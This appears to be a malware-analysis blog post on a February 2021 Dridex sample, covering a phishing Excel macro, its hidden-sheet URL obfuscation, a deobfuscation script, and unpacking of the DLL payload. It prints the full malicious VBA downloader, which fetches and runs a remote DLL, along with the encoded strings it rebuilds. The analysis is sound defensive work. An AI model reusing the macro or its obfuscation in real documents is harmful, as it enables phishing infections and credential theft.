Dridex Malware Analysis [8 Feb 2021]

Dridex, also known as Bugat and Cridex, is a banking trojan and information stealer operated by the criminal group tracked as “Indrik Spider” [1]. Dridex specializes in stealing banking credentials and is delivered through Microsoft Office products such as Word and Excel, using macros to fetch its payload. In previously recorded incidents the threat actors have used Dridex to hit high-value targets with ransomware [2].

A new Dridex sample was found today, Feb 8, 2021. This threat actor is known for reusing similar techniques and procedures across campaigns, and this sample is no exception: a slight update was found when analyzing it, but the overall procedure and technique are the same. I was referred to this sample by security researcher Moto_Sato [3], and the sample was collected from AnyRun [4]. This analysis takes a quick look at the threat actor's new update, artifacts and indicators. For a full analysis of a similar Dridex sample, see the previous post on this blog, which covered a sample discovered on Feb 1, 2021. This post uses dynamic analysis to download the second-stage sample and static analysis and debugging of the samples to check the results.

[Figure 1] Excel file in VT
[Figure 2] DLL file in VT

File Name           SHA256                                                            File Size
INV4362145800.xlsm  bc1d978695e3dc1666923fa13de923870a7604375d57bb6771e2f4bcd8ae8d56  73.25 KB
gwftgmyy.dll        e559d8d2e789cac8391fc3286b0c80efe0fc9a3bfaac15b124e7520ed0f0a02e  471.00 KB
[Table 1] Basic properties of the malicious samples, Ref: any.run and VT

Malware Analysis

1. Excel File

The threat actor sends a phishing email to the victim with an attached Microsoft Excel file, “INV4362145800.xlsm”, whose macro project is locked. The victim has to enable macros for the malicious file to be downloaded. The cells in the background are not empty; they contain characters. There are also three hidden sheets containing the rest of the characters, which together form a set of 50 URLs hosting the payload.

Using EvilClippy [5] to unlock the locked macro project, the VBA code could be extracted. The same tool was used by the threat actor to avoid detection. Comparing the code below with the previous sample, there is a small update, but overall it is still the same.


#If VBA7 And Win64 Then
    Private Declare PtrSafe Function xsmart_card Lib "urlmon" _
      Alias "URLDownloadToFileA" ( _
        ByVal pCaller As LongPtr, _
        ByVal szURL As String, _
        ByVal szFileName As String, _
        ByVal dwReserved As LongPtr, _
        ByVal lpfnCB As LongPtr _
      ) As Long
#Else
    Private Declare Function xsmart_card Lib "urlmon" _
      Alias "URLDownloadToFileA" ( _
        ByVal pCaller As Long, _
        ByVal szURL As String, _
        ByVal szFileName As String, _
        ByVal dwReserved As Long, _
        ByVal lpfnCB As Long _
      ) As Long
#End If


Function commercial_e(ll As String, lo As Integer)
commercial_e = Mid(ll, lo, 1)
End Function

Function prv_and_next(vvf As Variant) As String
Randomize: rr = 2 - 1: prv_and_next = vvf(Int((UBound(vvf) + rr) * Rnd))
End Function
Sub hello_messages()
figiner = Split(RTrim(dear_clients), v_time_year(")"))
Sheets(1).Cells(3, 1).Name = "travel_" & "T"
etnas = Split(figiner(1), v_time_year("+"))
For A = 0 To UBound(etnas) - LBound(etnas) + 1
On Error Resume Next
Sheets(1).Cells(3, 1).value = "=" & etnas(A)
Debug.Print ((((Run("" & "travel_" & "" & "T")))))
If A = 12 Then A_min_1 = court_and_four:
If A = 14 Then
Msira = court_and_four
xsmart_card 0, copy_data_a(prv_and_next(Split(figiner(0), v_time_year("S") & "s"))), A_min_1 & "\" & Msira, 0, 0
End If
Next
End Sub
Function court_and_four()
court_and_four = Sheets(1).Range("C1:C5").SpecialCells(xlCellTypeConstants)
End Function
Public Function copy_data_a(jk As String)
copy_data_a = Right(jk, Len(jk) - 1)
End Function
Function dear_clients()
Dim hmouses As String
Dim fig_1_1 As String: Dim value_cargos As String
Dim u As Integer: hmouses = help_resource(4)
fig_1_1 = help_resource(3): value_cargos = help_resource(2)
For u = 1 To Len(hmouses)
microtech = microtech & commercial_e(hmouses, u) & commercial_e(fig_1_1, u) & commercial_e(value_cargos, u)
Next
dear_clients = RTrim(microtech)
End Function
Function help_resource(d As Integer)
For Each ds In Sheets(d).UsedRange.SpecialCells(xlCellTypeConstants): world_docs = world_docs & ds: help_resource = world_docs
Next
End Function
Function v_time_year(df As String)
v_time_year = Replace(String(4, "Z"), "Z", df)
End Function

After a little cleaning, the characters stored in the three hidden sheets are shown below. The macro reads them with help_resource(4), help_resource(3) and help_resource(2) and interleaves them one character at a time to rebuild the URL list and the Excel formulas.

Sheet 1 
qt:h.moy9.rS8t:dp.bt./eziSsts/micqteoz8o.rS8t:csf.gun8kiSsts/pcc./7vzSShp/bi.ao.my5zSShp/reienoadv7zSShp/dsi/ih.rS4t:dhioteliso/hb.pSlt:tasokimtSShp/ateqlrmoeqg8tSShp/dtv.mma1aSsts/aerosrnaetSShp/isdnnaesri.trr6.rS4t:ihheml.mdqfiSsts/menoa5v.pSit:gcodhnctnoft.pS6t:mlesorcxj.pS0t:soetaesri.trpcciSsts/a.iczjhp.rS2t:eotenoawhntSShp/peheni7.pSat:plnagtootrghnozSShp/a.tu./s3.rS5t:heter.m61jtSShp/e.swc/9f5iSsts/ra.mra66aSsts/asraaows.rSzt:stotn.mzezaSsts/tub.zo5zSShp/or.v./kytSShp/ysatnn.mrdzvtSShp/oesidood6tSShp/hohplwc/cx5iSsts/yelbugvdrSShp/oaoeaeisnl5qiSsts/teoc.muhtSShp/uaogsi./s9iSsts/nreeb.m75tSShp/tenoa9g9rSShp/teaytaromp.rS9t:vasowb.pS9t:naolenoa2h.pSut:bgoionnimc7.pS6t:rhtshmmiuvo.rS7t:iot.mtfcaSsts/ittatc/eoaSsts/gstsl../dtiSsts/beannogu.pS0t:hhnoc.m2nzSShp/usrersosiv.r)ENEclCR0)+ENEm,"+S.M"0")+FSMREC""EWKA() LEAE++TA(0""+CC.YR)+ENEh,l++NLETE+S.M""O++TA(hf"hh"E&&u&)+ENEwb""kl)+ENEb,FG.RPE3(N"an,TOSC2,-)La&0Tclm&0+S.L(,)+ENEa,FCRA(29&ARD*+)H(N)67CRA(29&ARD*+)H(N)67CRA(29&ARD*+)A(8).l++TAE2b+CLe&,"hf&"AACCm00ph","kgro"s&&,0+FELEAE
=============================================================
Sheet 2
hp/cc./vzrSShp/rawsefg1.pSet:ecn5ni.mho4rSShp/ls7o./5z.pSot:a.xocrrciSsts/itsrjc/gfiSsts/orql../uaxiSsts/e.tcdotSShp/ranvisuo.bd39zSShp/eb.mvluaSsts/po.uii../z36aSsts/brec/k7.rSrt:asmis.gaptaSsts/voetanncibn./e7rSShp/.eisuic/ps.pS3t:btl../iuzSShp/c...roua.mhwzSShp/a.fo.golqzSShp/urdvnncibn./wr.pSvt:msenoa51wrSShp/nvel../qbtaSsts/.ae./jqzSShp/om.niousosrufyiSsts/ktutew6trSShp/akecic/twuaSsts/sraaoqi9.pSbt:kkcc./f2.rSct:snhai.mm0rSShp/o-litc/42.rSnt:b.oab/o9iSsts/ptfackf8aSsts/uehtyac./1cuaSsts/nrut.mgfeaSsts/iroiosohtd.pSst:p.vl./aojaSsts/cnrnlrc./hy.pSyt:getpac/k4aSsts/ssli.ict9.pSpt:yio.hic/fiaSsts/2l../7lgaSsts/u.dmit.m3vtSShp/kl.meozSShp/oloel../x6zSShp/l.gtnlen4hczSShp/am-saiydrrptSShp/nvoc/jk.rSqt:oegeydonp.rSgt:sama.iczu8.pSrt:grllt./jmzSShp/ildaoc/6miSsts/bcgxe.mdzxt))TA(i"H(1++TA(A")+ENEh"\++(NB(AHd,TOSC1),O(L)+S.M""3)+AEK(U++TA(kcl+CC.YR)+ENEv,"+S.M"gw,"klxh"th++TA(e"S&&l++TA(bLTEWKA()FDRmgG.RPE311&olh&"i&ph)+EVUCb++TA(bLTH(N)67CRA(29&ARD*+)H(N)67CRA(29&ARD*+)H(N)67CRA(29,N)+&d"+S.L(,)+A(go"&gw",&&C"A,&"kn"&&s"0  ba0)+I.O(L)
=============================================================
Sheet 3
ts/xocbh0aSsts/ulei2rigzSShp/dli.occ/8ldaSsts/ao5rakbxzSShp/ph.mop6.pSdt:alamtooq9.pSjt:ppt.iczz5h.pS5t:ivse7vcaSsts/s.navotnmiytjiSsts/hic/0h.rSwt:csneibuckwyp.rSet:aaalougprSShp/ldapao/g1.rSkt:dirae.tautaebcs8aSsts/tcnesmonyezSShp/c.icztieiSsts/pcicosric/9giSsts/ijfno/ljoiSsts/pte.tautaebe3szSShp/dal../1u7aSsts/na.iczq6b.rS1t:wrdrikgliSsts/uapaopl-u./do.pS1t:fsuruuejbaSsts/regirohev.rSft:ttai.mppjzSShp/ibaotgwbtSShp/pi.swc/vfaSsts/fsuovol7xrSShp/oqcoivf.pS3t:soeelor6.rStt:eplaiarota8z.rStt:cvtnec/0s.rS2t:plt.lw.mnf1zSShp/aleaehrm.rSmt:dm.itsveikgmzSShp/ilrilojx.rS7t:bcceodtlxezSShp/epjtasoho.rSht:b.iczyr8.rSxt:vbflovoc/ogaSsts/sec/kaiSsts/cnd.iczobqiSsts/ocnioi./j5uiSsts/caaui../v0gaSsts/faroviirSShp/rnawl.mr1tSShp/elelenoa12zSShp/aiveirxhziSsts/gardcoku.pSwt:ceaopsc/25la)S.M"l,A1)+S.M""J++TA(k,"+IIUESR(oG.RPE),CSFS)+ENEo,2++NLETE+S.M""i)+AEK(U++TA(0")+ENEodw"&&l"kc"k+S.M"g,hh""+S.M""E(TOSC2,I(oi"EWKA()))"c"k"&l""k++TAE2b+S.M""E(ARD*+)H(N)67CRA(29&ARD*+)H(N)67CRA(29&ARD*+)H(N)67RD*5"l)+EVUCa++Lwb0SodwAmm"C&,v"&&"rh"v&,-"bb,++LCSFS 

When debugging the VBA code in Microsoft Visual Studio, the first thing to look for is the list of URLs. 50 URLs were found in this sample; the full set is in Appendix A below. The code picks a random URL from this list to download the malicious DLL. It also builds a random name for the DLL and runs it with Regsvr32.exe.
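The string assembly done by dear_clients() and hello_messages() can be replayed outside Excel to recover the URL list without ever running the macro. The Python below is an added example and is not code from the original post: SHEET_1, SHEET_2 and SHEET_3 hold the first 45 characters of the three sheet strings exactly as printed above, and recovered URLs are printed defanged (hxxps, [.]) rather than as live links.

```python
# Added example, not from the original post: re-implements the macro's string
# assembly (dear_clients / hello_messages) so the URL list can be recovered offline.
# SHEET_1/2/3 are the first 45 characters of "Sheet 1", "Sheet 2" and "Sheet 3" as
# printed above; the VBA reads them with help_resource(4), (3) and (2) in that order.
SHEET_1 = "qt:h.moy9.rS8t:dp.bt./eziSsts/micqteoz8o.rS8t"
SHEET_2 = "hp/cc./vzrSShp/rawsefg1.pSet:ecn5ni.mho4rSShp"
SHEET_3 = "ts/xocbh0aSsts/ulei2rigzSShp/dli.occ/8ldaSsts"


def interleave(a: str, b: str, c: str) -> str:
    """dear_clients(): position u of the result is a[u] & b[u] & c[u].

    The VBA loop runs to Len(a); Mid() past the end of b or c yields "", which the
    slices below reproduce. RTrim removes the trailing space seen in Sheet 3.
    """
    return "".join(a[u] + b[u:u + 1] + c[u:u + 1] for u in range(len(a))).rstrip()


def deobfuscate(a: str, b: str, c: str):
    """hello_messages(): split the blob into the URL list and the formula list."""
    blob = interleave(a, b, c)
    # v_time_year(")") builds "))))"; everything before it is the URL section.
    sections = blob.split("))))")
    # v_time_year("S") & "s" builds "SSSSs"; copy_data_a() drops the first (junk)
    # character of whichever element prv_and_next() picks at random.
    urls = [u[1:] for u in sections[0].split("SSSSs")]
    # The section after "))))" is split on "++++"; each piece is written to a cell
    # as "=" & piece and evaluated with Run(). It is absent from this short sample.
    formulas = sections[1].split("++++") if len(sections) > 1 else []
    return urls, formulas


def defang(url: str) -> str:
    """Neutralize a recovered URL for reporting (hxxps, [.])."""
    return url.replace("https://", "hxxps://").replace(".", "[.]")


if __name__ == "__main__":
    urls, formulas = deobfuscate(SHEET_1, SHEET_2, SHEET_3)
    for u in urls:
        print(defang(u))  # last line is a fragment: the 45-char sample ends mid-element
```

Feeding the complete sheet strings instead of the 45-character prefixes yields the full list of 50 URLs plus the formula section.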

In dynamic analysis, the second-stage DLL is downloaded from the malicious URL to the %TEMP% folder and loaded into a Regsvr32.exe process. The next step is to analyze the DLL file and see whether it is similar to the previous samples.

2. DLL File

All DLL files downloaded from the URLs appear to be the same, the only difference being the DLL name. At first look, this DLL file, “gwftgmyy.dll”, seems slightly more optimized than the previous sample [6]. The sample appears to have been compiled in 2014!

Looking at the IDA navigation bar to compare the amount of code with the file size [471.00 KB], and at the large gray area, the file appears to be packed.

The threat actor is using the same self-injection technique as before. A quick debugging session in x32dbg unpacks the file by setting breakpoints on VirtualAlloc and VirtualProtect. With this method, the PE file first has to allocate a memory region using VirtualAlloc.

The second step is to hit the VirtualProtect breakpoint, at which point the stub is unpacked and the self-injection takes place.

To dump the unpacked version, use ProcessHacker and locate the memory region at the address held in the EDX register.

The unpacked binary requires fixing its section headers in PE-bear, matching the raw addresses with the virtual ones, in order to recover the import library.
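The header fix described above can also be scripted. The Python below is an added example, not code from the original post or from PE-bear: build_dumped_image() constructs a small 32-bit PE laid out the way a memory dump is (sections at their virtual addresses, headers still holding on-disk raw offsets), and fix_section_headers() rewrites each section's PointerToRawData and SizeOfRawData to its VirtualAddress and VirtualSize, the same edit made by hand in PE-bear.

```python
import struct

# Added example, not from the post: the PE-bear section-header fix as a script.
# build_dumped_image() is a constructed 32-bit PE, not a real Dridex dump. Its sections
# sit at their virtual addresses (memory layout) but the headers still carry on-disk
# raw offsets, so imports cannot be resolved until raw and virtual values are matched.
SECTION_FMT = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def build_dumped_image() -> bytes:
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)       # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x2102)  # i386, 2 sections
    opt = struct.pack("<H", 0x10B) + b"\0" * (0xE0 - 2)      # PE32 magic, rest zeroed
    sections = [  # name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
        (b".text", 0x800, 0x1000, 0x800, 0x400),
        (b".rdata", 0x300, 0x2000, 0x400, 0xC00),
    ]
    table = b"".join(struct.pack(SECTION_FMT, n, vs, va, rs, rp, 0, 0, 0, 0, 0x60000020)
                     for n, vs, va, rs, rp in sections)
    return (dos + b"PE\0\0" + coff + opt + table).ljust(0x3000, b"\0")


def _section_offsets(image):
    """File offsets of the IMAGE_SECTION_HEADER entries."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    num_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    first = e_lfanew + 24 + opt_size  # signature + COFF header + optional header
    return [first + i * 40 for i in range(num_sections)]


def read_sections(image):
    """(name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData) per section."""
    out = []
    for off in _section_offsets(image):
        f = struct.unpack_from(SECTION_FMT, image, off)
        out.append((f[0].rstrip(b"\0").decode(), f[1], f[2], f[3], f[4]))
    return out


def fix_section_headers(image):
    """Set PointerToRawData = VirtualAddress and SizeOfRawData = VirtualSize."""
    buf = bytearray(image)
    for off in _section_offsets(buf):
        f = list(struct.unpack_from(SECTION_FMT, buf, off))
        f[3], f[4] = f[1], f[2]
        struct.pack_into(SECTION_FMT, buf, off, *f)
    return bytes(buf)
```

Run read_sections() on a real dump before and after the fix to confirm that every section's raw pointer now equals its virtual address; only then will the import table resolve.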

Finally, the unpacked file seems to be the same one discovered in the previous analysis, with similar timestamps.

File Name           SHA256                                                            File Size
715c0000_Fixed.bin  20bf0a8d139b5e517799339c3db2169ead923e65259ac10eb4ba026b2a4d2246  516.00 KB
[Table 2] Basic properties of the unpacked file submitted to VT [7]

Appendix A

DO NOT click any of the URLs


References

[1] Indrik Spider, https://malpedia.caad.fkie.fraunhofer.de/actor/indrik_spider

[2] Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware, https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

[3] Security Researcher, https://twitter.com/58_158_177_102

[4] Excel Sample, https://app.any.run/tasks/baaf23e7-a3d1-42c1-b4b4-fbb827b2febc/#

[5] EvilClippy Github repository, https://github.com/outflanknl/EvilClippy

[6] Dridex DLL VT, https://www.virustotal.com/gui/file/26a659ec56c7bd7b83a2f968626c1524bda829e0fefff37ecf4c4fb55ad158e3/detection

[7] unpacked DLL, https://www.virustotal.com/gui/file/20bf0a8d139b5e517799339c3db2169ead923e65259ac10eb4ba026b2a4d2246/details
